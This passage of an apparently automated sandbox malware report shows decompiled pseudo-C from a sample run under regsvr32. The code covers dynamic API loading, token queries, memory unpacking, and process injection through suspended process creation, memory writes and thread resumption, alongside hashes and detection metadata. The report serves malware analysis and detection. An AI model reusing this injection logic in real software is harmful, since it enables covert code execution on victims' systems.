					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                                                                                                              0x042aeec4
                                                                                                                                                                                              0x042aeec6
                                                                                                                                                                                              0x042aeec9
                                                                                                                                                                                              0x042aeecc
                                                                                                                                                                                              0x042aeed2
                                                                                                                                                                                              0x042aef2f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aef2f
                                                                                                                                                                                              0x042aeed4
                                                                                                                                                                                              0x042aeedf
                                                                                                                                                                                              0x042aeee2
                                                                                                                                                                                              0x042aeee7
                                                                                                                                                                                              0x042aeeec
                                                                                                                                                                                              0x042aeeef
                                                                                                                                                                                              0x042aeef1
                                                                                                                                                                                              0x042aeef4
                                                                                                                                                                                              0x042aeef7
                                                                                                                                                                                              0x042aeefc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeefe
                                                                                                                                                                                              0x042aeefe
                                                                                                                                                                                              0x042aef10
                                                                                                                                                                                              0x042aef1d
                                                                                                                                                                                              0x042aef21
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aef23
                                                                                                                                                                                              0x042aef26
                                                                                                                                                                                              0x042aef27
                                                                                                                                                                                              0x042aef2d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aef2d
                                                                                                                                                                                              0x042aef44
                                                                                                                                                                                              0x042aef49
                                                                                                                                                                                              0x042aef4d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aef59
                                                                                                                                                                                              0x042aef59
                                                                                                                                                                                              0x042aef5b
                                                                                                                                                                                              0x042aef5b
                                                                                                                                                                                              0x042aef61
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aef67
                                                                                                                                                                                              0x042aef6b
                                                                                                                                                                                              0x042aef6f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aef6f
                                                                                                                                                                                              0x042aef75
                                                                                                                                                                                              0x042aef7d
                                                                                                                                                                                              0x042aef82
                                                                                                                                                                                              0x042aef85
                                                                                                                                                                                              0x042aef85
                                                                                                                                                                                              0x042aef87
                                                                                                                                                                                              0x042aef8b
                                                                                                                                                                                              0x042aef93
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aef97
                                                                                                                                                                                              0x042aef9f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aef9f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 042AEF8B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 042AEF97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                              • API String ID: 2574300362-2738580789
                                                                                                                                                                                              • Opcode ID: 759ffd7343ff5d91bf36cdb4d1ac8ff8b16c373860011482d3f0fde83ce8cdbd
                                                                                                                                                                                              • Instruction ID: 52e2ab8dcdc08d0e1f51b48ae4886c155903d1abefa39317e418cb2488af9c34
                                                                                                                                                                                              • Opcode Fuzzy Hash: 759ffd7343ff5d91bf36cdb4d1ac8ff8b16c373860011482d3f0fde83ce8cdbd
                                                                                                                                                                                              • Instruction Fuzzy Hash: A131B071B601169BCB24CF6DD884AAEBBE5EF44304F294469DC05E7351E7B0F962CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AC7F5 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 281 42ac7f5-42ac815 GetTokenInformation 282 42ac85b 281->282 283 42ac817-42ac820 GetLastError 281->283 284 42ac85d-42ac861 282->284 283->282 285 42ac822-42ac832 call 42a8bde 283->285 288 42ac838-42ac84b GetTokenInformation 285->288 289 42ac834-42ac836 285->289 288->282 290 42ac84d-42ac859 call 42a8bf4 288->290 289->284 290->289
                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                              			E042AC7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E042A8BDE(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E042A8BF4( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                                                                                                              0x042ac7f8
                                                                                                                                                                                              0x042ac7f9
                                                                                                                                                                                              0x042ac800
                                                                                                                                                                                              0x042ac808
                                                                                                                                                                                              0x042ac80c
                                                                                                                                                                                              0x042ac815
                                                                                                                                                                                              0x042ac85b
                                                                                                                                                                                              0x042ac85b
                                                                                                                                                                                              0x042ac822
                                                                                                                                                                                              0x042ac82a
                                                                                                                                                                                              0x042ac82c
                                                                                                                                                                                              0x042ac832
                                                                                                                                                                                              0x042ac84b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ac84d
                                                                                                                                                                                              0x042ac852
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ac858
                                                                                                                                                                                              0x042ac834
                                                                                                                                                                                              0x042ac834
                                                                                                                                                                                              0x042ac834
                                                                                                                                                                                              0x042ac834
                                                                                                                                                                                              0x042ac832
                                                                                                                                                                                              0x042ac861

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,042A0000,00000000,00000000,?,042AC876,00000000,00000000,?,042AC89F), ref: 042AC810
                                                                                                                                                                                              • GetLastError.KERNEL32(?,042AC876,00000000,00000000,?,042AC89F,00001644,?,042ADFCE), ref: 042AC817
                                                                                                                                                                                                • Part of subcall function 042A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,042A959D,00000100,?,042A6507), ref: 042A8BEC
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,042AC876,00000000,00000000,?,042AC89F,00001644,?,042ADFCE), ref: 042AC846
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2499131667-0
                                                                                                                                                                                              • Opcode ID: 05d22ca633d66eac573b8adb2206c87ad6a3ba4a753e40a59bee172e0479105b
                                                                                                                                                                                              • Instruction ID: 0ca8905b04af5e7ed0085a89dcf8e589c464976220abfba1e8dd58a25cd895a6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 05d22ca633d66eac573b8adb2206c87ad6a3ba4a753e40a59bee172e0479105b
                                                                                                                                                                                              • Instruction Fuzzy Hash: D20184B2710119BFAB216AAADC48DAB7FACFF457A07110469FD05D2110E660ED10C6E0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042ABC84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 293 42abc84-42abcd3 call 42a8d6d * 2 CreateProcessW
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E042ABC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E042A8D6D(__edx, 0, 0x10);
				E042A8D6D( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





                                                                                                                                                                                              0x042abc95
                                                                                                                                                                                              0x042abca2
                                                                                                                                                                                              0x042abcaa
                                                                                                                                                                                              0x042abcc6
                                                                                                                                                                                              0x042abccc
                                                                                                                                                                                              0x042abcd3

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 042ABCC6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcessmemset
                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                              • API String ID: 2296119082-2746444292
                                                                                                                                                                                              • Opcode ID: ed83407d9e011f10b19b360724e72c13000ac853a9619853be576f438d0904d5
                                                                                                                                                                                              • Instruction ID: 1bda7f56f7c63e887b108923f9b76bc4f24a750b5376de2e9d77ead22108248c
                                                                                                                                                                                              • Opcode Fuzzy Hash: ed83407d9e011f10b19b360724e72c13000ac853a9619853be576f438d0904d5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 36F030F17506087FF720E6699C0AFBF3AACCB41714F500125BA05EB1C0E6A4AD0582A5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0082FF20 Relevance: 3.2, APIs: 2, Instructions: 195memoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 298 82ff20-82ffbe VirtualAlloc call 82fb50 call 82fb90 303 82ffc9-82ffd3 298->303 304 830031-830083 call 82fcd0 303->304 305 82ffd5-82ffdc 303->305 312 8300b1-8300b8 304->312 313 830085-830089 304->313 307 830026-83002f 305->307 308 82ffde-82ffe5 305->308 307->303 308->307 310 82ffe7-830023 call 82fb90 308->310 310->307 316 8300c3-8300cd 312->316 313->312 315 83008b-8300ae call 82fc30 313->315 315->312 319 83011f-830154 call 830440 316->319 320 8300cf-8300d6 316->320 323 830114-83011d 320->323 324 8300d8-8300df 320->324 323->316 324->323 326 8300e1-830112 call 830160 VirtualProtect 324->326 326->323
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0082FF6B
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00830112
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_810000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Virtual$AllocProtect
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2447062925-0
                                                                                                                                                                                              • Opcode ID: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                                                                                                                                                                              • Instruction ID: d1a9b179b63b648dc6a7c836bce55d66c0e7a0d212eb1d14420f1f3e61ccf768
                                                                                                                                                                                              • Opcode Fuzzy Hash: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B91B875A00109DFCB48CF98D590EAEB7B5FF88304F148159E915AB346D735EA82CFA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AD804 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 330 42ad804-42ad824 call 42ad6dc 333 42ad82a-42ad849 call 42ab557 330->333 334 42ad955-42ad958 330->334 337 42ad84f-42ad851 333->337 338 42ad945-42ad954 call 42a8bf4 333->338 339 42ad933-42ad943 call 42a8bf4 337->339 340 42ad857-42ad859 337->340 338->334 339->338 342 42ad85c-42ad85e 340->342 345 42ad921-42ad92d 342->345 346 42ad864-42ad883 call 42a8d6d call 42abc84 342->346 345->337 345->339 352 42ad8e5-42ad8e9 346->352 353 42ad885-42ad898 call 42ad959 346->353 354 42ad8eb-42ad8ed 352->354 355 42ad914-42ad91b 352->355 353->352 360 42ad89a-42ad8b2 353->360 357 42ad8fe-42ad90e 354->357 358 42ad8ef-42ad8f5 354->358 355->342 355->345 357->355 358->357 363 42ad8e2 360->363 364 42ad8b4-42ad8c9 GetLastError call 42ada57 360->364 363->352 367 42ad8cb-42ad8d6 364->367 368 42ad8de-42ad8df FindCloseChangeNotification 364->368 370 42ad8d8 367->370 371 42ad8d9 367->371 368->363 370->371 371->368
                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                              			E042AD804(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E042AD6DC( &_v16);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x42bf81c; // 0x48efbe8
				_t7 = _t38 + 0xac; // 0x1d290ddf
				E042AB557( &_v80,  *_t7 + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E042A8BF4( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E042A8D6D( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E042ABC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E042AD959(E042A61C5,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x42bf818; // 0x48ef8b0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E042ADA57( &_v40);
									_t63 =  *0x42bf818; // 0x48ef8b0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x42bf818; // 0x48ef8b0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x42bf818; // 0x48ef8b0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x42bf818; // 0x48ef8b0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x42bf818; // 0x48ef8b0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E042A8BF4(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























                                                                                                                                                                                              0x042ad80a
                                                                                                                                                                                              0x042ad813
                                                                                                                                                                                              0x042ad816
                                                                                                                                                                                              0x042ad818
                                                                                                                                                                                              0x042ad81d
                                                                                                                                                                                              0x042ad81f
                                                                                                                                                                                              0x042ad822
                                                                                                                                                                                              0x042ad824
                                                                                                                                                                                              0x042ad958
                                                                                                                                                                                              0x042ad958
                                                                                                                                                                                              0x042ad82a
                                                                                                                                                                                              0x042ad833
                                                                                                                                                                                              0x042ad83c
                                                                                                                                                                                              0x042ad841
                                                                                                                                                                                              0x042ad844
                                                                                                                                                                                              0x042ad849
                                                                                                                                                                                              0x042ad945
                                                                                                                                                                                              0x042ad94b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad954
                                                                                                                                                                                              0x042ad84f
                                                                                                                                                                                              0x042ad857
                                                                                                                                                                                              0x042ad859
                                                                                                                                                                                              0x042ad85c
                                                                                                                                                                                              0x042ad86b
                                                                                                                                                                                              0x042ad876
                                                                                                                                                                                              0x042ad87c
                                                                                                                                                                                              0x042ad881
                                                                                                                                                                                              0x042ad883
                                                                                                                                                                                              0x042ad890
                                                                                                                                                                                              0x042ad898
                                                                                                                                                                                              0x042ad8a3
                                                                                                                                                                                              0x042ad8ae
                                                                                                                                                                                              0x042ad8b2
                                                                                                                                                                                              0x042ad8b4
                                                                                                                                                                                              0x042ad8bd
                                                                                                                                                                                              0x042ad8c4
                                                                                                                                                                                              0x042ad8c9
                                                                                                                                                                                              0x042ad8cb
                                                                                                                                                                                              0x042ad8d0
                                                                                                                                                                                              0x042ad8d6
                                                                                                                                                                                              0x042ad8d8
                                                                                                                                                                                              0x042ad8d8
                                                                                                                                                                                              0x042ad8d9
                                                                                                                                                                                              0x042ad8d9
                                                                                                                                                                                              0x042ad8df
                                                                                                                                                                                              0x042ad8df
                                                                                                                                                                                              0x042ad8e2
                                                                                                                                                                                              0x042ad8e2
                                                                                                                                                                                              0x042ad898
                                                                                                                                                                                              0x042ad8e9
                                                                                                                                                                                              0x042ad8ed
                                                                                                                                                                                              0x042ad8ef
                                                                                                                                                                                              0x042ad8f8
                                                                                                                                                                                              0x042ad8f8
                                                                                                                                                                                              0x042ad8fe
                                                                                                                                                                                              0x042ad906
                                                                                                                                                                                              0x042ad909
                                                                                                                                                                                              0x042ad911
                                                                                                                                                                                              0x042ad911
                                                                                                                                                                                              0x042ad914
                                                                                                                                                                                              0x042ad915
                                                                                                                                                                                              0x042ad91b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad91b
                                                                                                                                                                                              0x042ad924
                                                                                                                                                                                              0x042ad927
                                                                                                                                                                                              0x042ad928
                                                                                                                                                                                              0x042ad92d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad933
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ad933
                                                                                                                                                                                              0x042ad933
                                                                                                                                                                                              0x042ad936
                                                                                                                                                                                              0x042ad93c
                                                                                                                                                                                              0x042ad940

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                                • Part of subcall function 042ABC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 042ABCC6
                                                                                                                                                                                                • Part of subcall function 042AD959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 042AD9BB
                                                                                                                                                                                                • Part of subcall function 042AD959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 042ADA04
                                                                                                                                                                                                • Part of subcall function 042AD959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 042ADA21
                                                                                                                                                                                                • Part of subcall function 042AD959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 042ADA42
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000001), ref: 042AD8B4
                                                                                                                                                                                                • Part of subcall function 042ADA57: ResumeThread.KERNELBASE(?,042AD8C2,?,?,00000001), ref: 042ADA5F
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 042AD8DF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2212882986-0
                                                                                                                                                                                              • Opcode ID: 720cda09a60684dcbd5dda40d159137fa3286a2cfaa6bc453fd8adfb85604bf5
                                                                                                                                                                                              • Instruction ID: f8c5511b1b543f2a12a305e5ec469265f933d824d3cea187b2723e0c5a130d99
                                                                                                                                                                                              • Opcode Fuzzy Hash: 720cda09a60684dcbd5dda40d159137fa3286a2cfaa6bc453fd8adfb85604bf5
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8416E71B2020A9FDB10DFA9E988E9D77FAEF48314F114065E905E7251DB30AE55CB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00830340 Relevance: 3.1, APIs: 2, Instructions: 86memoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 372 830340-830368 373 830430-830433 372->373 374 83036e-830374 372->374 375 830377-83037e 374->375 375->373 376 830384-8303a6 375->376 378 830422-83042b 376->378 379 8303a8-8303b1 376->379 378->375 380 8303b4-8303ba 379->380 380->378 381 8303bc-8303c4 380->381 382 830417-830420 381->382 383 8303c6-830415 VirtualProtect * 2 381->383 382->380 383->373
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000004,00000040,?), ref: 008303DB
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 00830413
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_810000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                              • Opcode ID: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                                                                                                                                                                                              • Instruction ID: 2ea5a997d6b4d8e35bcba8ba64912639b570b4ae94d4d6688ebd95a8956a2ac5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3417674A00209EFCF08CF88C891AEEB7B5FF88318F148199E915AB355D775AA51CF94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042A64EF Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                                                              			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x42bf818; // 0x48ef8b0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E042A8BC9();
				E042A9591();
				 *0x42bf830 = _a4;
				E042B3CD5(_a4);
				 *_t49 = 0xf43;
				 *0x42bf818 = E042AF05C(0x42bca50, 0x138);
				 *_t49 = 0x111;
				_t23 = E042A9DF2(0x42bca50);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E042A8BAF();
					 *_t49 = 0x40e;
					_t28 = E042A9CB5(E042A109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x42bf828 = E042AF05C(0x42bcbb8, _t48);
						E042A6370(_t48, __eflags);
						E042A8BF4( &_a8, 0xfffffffe);
						_t36 =  *0x42bf818; // 0x48ef8b0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E042A6298, 0, 0,  &_v8);
					 *0x42bf83c = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E042A8BAF();
				goto L3;
			}













                                                                                                                                                                                              0x042a64f2
                                                                                                                                                                                              0x042a64f7
                                                                                                                                                                                              0x042a65db
                                                                                                                                                                                              0x042a65df
                                                                                                                                                                                              0x042a65d4
                                                                                                                                                                                              0x042a65d6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a65d6
                                                                                                                                                                                              0x042a65e1
                                                                                                                                                                                              0x042a65eb
                                                                                                                                                                                              0x042a6556
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a6556
                                                                                                                                                                                              0x042a64fd
                                                                                                                                                                                              0x042a6502
                                                                                                                                                                                              0x042a650b
                                                                                                                                                                                              0x042a6510
                                                                                                                                                                                              0x042a651a
                                                                                                                                                                                              0x042a652b
                                                                                                                                                                                              0x042a6530
                                                                                                                                                                                              0x042a6537
                                                                                                                                                                                              0x042a653c
                                                                                                                                                                                              0x042a653e
                                                                                                                                                                                              0x042a6541
                                                                                                                                                                                              0x042a654d
                                                                                                                                                                                              0x042a654e
                                                                                                                                                                                              0x042a655a
                                                                                                                                                                                              0x042a655f
